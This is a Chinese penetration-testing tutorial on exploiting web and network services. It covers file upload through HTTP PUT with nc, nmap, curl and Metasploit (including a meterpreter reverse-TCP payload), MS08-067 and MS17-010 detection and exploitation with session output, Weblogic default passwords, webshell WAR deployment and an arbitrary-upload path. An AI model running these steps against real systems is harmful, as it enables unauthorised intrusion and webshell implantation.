Web漏洞利用姿势的示例分析

1、HTTP PUT方法利用

PUT是用来进行文件管理的方法,若运维人员未修改Web服务器缺省配置,依然支持这些方法,则可以向服务器文件系统任意上传文件。

1.1、 Netcat利用PUT方法

Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士**”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。

查看得知Web服务开启PUT方法后,输入如下命令上传文件:

nc IP PORT

PUT /dav/hack.txt HTTP/1.1

Host: IP

Web漏洞利用姿势的示例分析

按两次回车可以看到hacked.txt文件已经成功创建,状态码是201,文件创建位置为/dav/目录。

1.2、Nmap利用PUT方法

命令:

nmap -p 端口 IP -script http-put-script-args http-put.url=’/dav/test.php’,http-put.file=’/root/test.php’

命令讲解:

-script http-put //选择http-put脚本,脚本支持使用http put方法上传文件。

-script-args //设置脚本参数1、2

http-put.url=’/dav/test.php’ //设置参数1为上传目标文件路径

http-put.file=’/root/test.php’ //设置参数2为上传本地文件路径。

Web漏洞利用姿势的示例分析

图中可以看到通过Nmap脚本上传成功。

1.3 BurpSuite利用PUT方法

使用日常见面的BurpSuite访问上传目标路径抓取数据包,修改数据包请求方式及上传路径,在请求正文中写入文件内容,发包至Web服务器。

Web漏洞利用姿势的示例分析

服务器响应包显示文件创建成功。

Web漏洞利用姿势的示例分析

1.4 CURL利用PUT方法

CURL是一个利用URL语法在命令行下工作的文件传输工具,通过指定的URL来上传或下载数据,并将数据展示出来。curl中的c表示client,而URL,就是URL。

通过PUT方法创建文件命令如下:

命令1:

curl -i -XPUT -H “Content-Type: text/plain; charset=utf-8” -d “hack completed” http://192.168.40.4/dav/hack.php

Web漏洞利用姿势的示例分析

命令讲解:

-i/–include //输出时包括protocol头信息

-X/–request <command> //指定PUT命令

-H/–header <line> //自定义头信息“Content-Type:text/plain; charset=utf-8”传递给服务器

-d/–data <data> //HTTP POST方式将文本写入创建的http://192.168.40.4/dav/hack.php

命令2:

curl -i -X PUT -H “Content-Type:application/xml; charset=utf-8″ -d @”F:1.php” http://192.168.40.4/dav/hack.php

Web漏洞利用姿势的示例分析

命令讲解:

-d @“filename” //从文件读入内容

Web漏洞利用姿势的示例分析

1.5 QuickPuT脚本利用PUT方法

QuickPut是Python命令行工具,可以利用该脚本通过HTTP PUT方法来上传文件到服务器。

上传命令:

python2 QuickPut.py F:1.php http://192.168.40.4/dav/hack1.php

Web漏洞利用姿势的示例分析

命令讲解:

python QuickPut.py <本地文件> <目标URL>

1.6 Metasploit利用PUT方法

Metasploit的辅助模块auxiliary/scanner/http/http_put可实现文件上传,删除操作。

命令:

use auxiliary/scanner/http/http_put //使用http_put模块

Web漏洞利用姿势的示例分析

show options //显示模块参数

set RHOSTS 192.168.40.4 //设置目标IP

set PATH /dav/ //设置目标路径

set payload php/meterpreter/reverse_tcp //设置攻击载荷

set filename msf.php //设置上传文件名

Web漏洞利用姿势的示例分析

set FILEDATA file://root/test.php //设置上传本地文件数据路径

exploit //开始攻击

Web漏洞利用姿势的示例分析

返回结果显示成功上传文件。

2.SMB漏洞利用

进行信息收集端口扫描后发现主机开启139,445端口且banner显示为Microsoft Windows,则会联想到与139、445端口SMB漏洞,比较常见的有ms17-010,ms08-067等。

漏洞检测

命令:

namp –script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse –sTIP

namp –script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP

命令讲解:

–script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //使用Nmapms08-067漏洞扫描脚本

-sT //使用TCP扫描

若输出结果为:

smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows system vulnerable toremote code execution (MS08-067)

State: VULNERABLE

IDs: CVE:CVE-2008-4250

The Server service inMicrosoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,Vista Goldand SP1, Server 2008, and 7 Pre-Beta allows remote attackers to executearbitrarycode via a crafted RPC request that triggers the overflow during pathcanonicalization.

Disclosure date: 2008-10-23

References:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250

则说明存在ms08-067漏洞,ms17-010同上。

漏洞利用

使用MSF smb攻击模块,利用ms08-067与ms17-010漏洞。

msf> use exploit/windows/smb/ms08_067_netapi

msfexploit(ms08_067_netapi) > set RHOST IP

msfexploit(ms08_067_netapi) > exploit

[*]Started reverse TCP handler on 本地监听IP端口

[*]目标IP:445- Automatically detecting the target…

[*]目标IP:445- Fingerprint: Windows 2000 – Service Pack 0 – 4 – lang:English

[*]目标IP:445- Selected Target: Windows 2000 Universal

[*]目标IP:445- Attempting to trigger the vulnerability…

[*]Sending stage (957487 bytes) to 目标IP

[*]Meterpreter session 2 opened (监听IP端口 -> 目标端口反弹)

meterpreter>

ms17-010漏洞利用同上。

3.Weblogic漏洞利用

在渗透测试中常常会遇到Weblogic Server应用服务器,看到Weblogic Server后联想到Weblogic Server可能会存在后台管理弱口令、JAVA反序列化漏洞、任意文件上传漏洞等许多本版的各种CVE漏洞。下面分享下Weblogic各种漏洞的利用手法。

Web漏洞利用姿势的示例分析3.1 后台登录弱口令

常见Weblogic Server登录弱口令:

weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

若存在即可登录应用服务器管理后台,上传webshellwar包。

Web漏洞利用姿势的示例分析

上传后在应用服务器中部署war包

Web漏洞利用姿势的示例分析

Web漏洞利用姿势的示例分析

Web漏洞利用姿势的示例分析上传部署war包成功后即可访问大马。

3.2 JAVA反序列化漏洞

CVE漏洞可直接使用脚本检测,然后根据漏洞代码寻找exp脚本漏洞利用。

Weblogic漏洞检测脚本十分强大,可检测各种CVE、管理后台路径、SSRF、弱口令、并支持后期扩展。

Web漏洞利用姿势的示例分析

也可利用Java反序列化漏洞利用工具直接进行检测利用。漏洞工具提供漏洞检测、命令执行、文件上传、批量检查功能。

Web漏洞利用姿势的示例分析

3.3 Weblogic 任意文件上传漏洞

通过爆破Weblogic返回信息。

Web漏洞利用姿势的示例分析

获取到登录口令、服务名、随机字符目录,构造上传POC进行测试文件上传。

在/bea_wls_deployment_internal/DeploymentService路径下传入以下数据

Web漏洞利用姿势的示例分析

服务器返回上传成功和文件绝对路径。

Web漏洞利用姿势的示例分析

访问此上传文件路径后显示上传文件内容

http://IP/bea_wls_deployment_internal/shell.jsp

Web漏洞利用姿势的示例分析

上述就是小编为大家分享的Web漏洞利用姿势示例分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

文章标题:Web漏洞利用姿势的示例分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/28722

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年9月22日 下午9:57
下一篇 2022年9月22日 下午9:59

相关推荐

  • SpringBoot登录验证token拦截器如何实现

    用户访问接口验证,如果用户没有登录,则不让他访问除登录外的任何接口。 实现思路: 1.前端登录,后端创建token(通过JWT这个依赖),返给前端 2.前端访问其他接口,传递token,后端判断token存在以或失效 3.失效或不存在,则返回失效提示,前端根据接口返回的失效提示,让其跳转到登录界面 …

    2022年9月20日
    24100
  • 使用ZoomEye寻找APT攻击的示例分析

    ZoomEye线上的数据是覆盖更新的模式,也就是说第2次扫描如果没有扫描到数据就不会覆盖更新数据,ZoomEye上的数据会保留第1次扫描获取到的banner数据,这个机制在这种恶意攻击溯源里其实有着很好的场景契合点:恶意攻击比如Botnet、APT等攻击使用的下载服务器被发现后一般都是直接停用抛弃,…

    2022年9月2日
    13300
  • 如何用Redis实现排行榜及相同积分按时间排序功能

    需求:对组队活动中各个队伍的贡献值进行排行。 不考虑积分相同 Redis的Sorted Set是String类型的有序集合。集合成员是唯一的,这就意味着集合中不能出现重复的数据。 每个元素都会关联一个double类型的分数。redis正是通过分数来为集合中的成员进行从小到大的排序。 有序集合的成员是…

    2022年8月31日
    58800
  • 创业公司为何要进行人员培训?

    本文来自Worktile 运营国际事业部新晋小鲜肉 @邵智康的激情分享,其独到而又不失水准的看法如一股清流洒向人间如果你正囿于人员培训的问题,那就千万走过路过不要错过啦 在企业发展的巨流河里,无论商业环境如何发展与变迁,行业竞争如何残酷而激烈,对于无数大大小小的企业来说,他们在许多年的浮浮沉沉中也许…

    2022年3月20日
    23200
  • 怎么使用CSS混合模式让文字智能适配背景颜色

    页面上有一段文本,能否实现这段文本在不同背景色下展示不同的颜色?也就是俗称的智能变色。像是下面这样: 文本在黑色底色上表现为白色,在白色底色上表现为黑色。看似很复杂的一个效果,但是其实在 CSS 中非常好实现,今天就介绍这样一个小技巧,在 CSS 中,利用混合模式 mix-blend-mode: d…

    2022年9月8日
    10000
  • windows nvidia驱动如何更新

    nvidia驱动更新方法: 1、首先我们下载一个nvidia GeForce experience软件。 2、下载安装完成后,点击右下角的nvidia图标,打开nvidia GeForce experience。 3、打开后,进入上方的“驱动程序”选项。 4、然后点击“检查更新文件”可以扫描到最新的…

    2022年8月29日
    7600
  • html有哪些常用的结构元素

    html常用的结构元素有:1、div,可定义文档中的分区或节,用于为HTML文档内大块(block-level)的内容提供结构和背景;2、section,表示文档中的一个区域;3、article,表示文档、页面、应用或网站中的独立结构,其意在成为可独立分配的或可复用的结构;4、aside,表示一个和…

    2022年9月16日
    11000
  • App崩溃的6个常见原因是什么

    人们讨厌应用程序崩溃,尤其是是程序减速或卡死几秒钟这样的现象。根据Dimensional Research的一项调查,61%的用户希望程序在4秒内启动,而49%的用户希望在2秒内响应输入。 如果应用发生崩溃,冻结或报错等现象,53%的用户会将APP卸载。 无论您的对象是消费者还是企业,崩溃问题会令他…

    2022年9月2日
    83600
  • “开会”的正确打开方式:盘点那些没必要开和应该开的会

    先想象一个场景:每天在你忙的焦头烂额之时,你的钉钉/企业微信/Worktile等办公协作软件突然弹出一个开会通知……你的第一反应肯定是:“怎么又要开会啊?”因为一个会议,大半天的工作时间又没了。 不知道从何时起,频繁且冗长的会议占据了我们的大多数工作时间,严重降低了工作效率。…

    2022年3月20日
    29200
  • C语言内存分配函数被污染的示例分析

    1、被污染的内存分配 C 语言的内存分配函数包括 malloc()、 kmalloc 、 smalloc()、 xmalloc()、realloc()、 calloc()、 GlobalAlloc()、 HeapAlloc()等等,以 malloc()为例, malloc() 函数的原型为: ext…

    2022年9月20日
    10100
联系我们
站长微信
站长微信
分享本页
返回顶部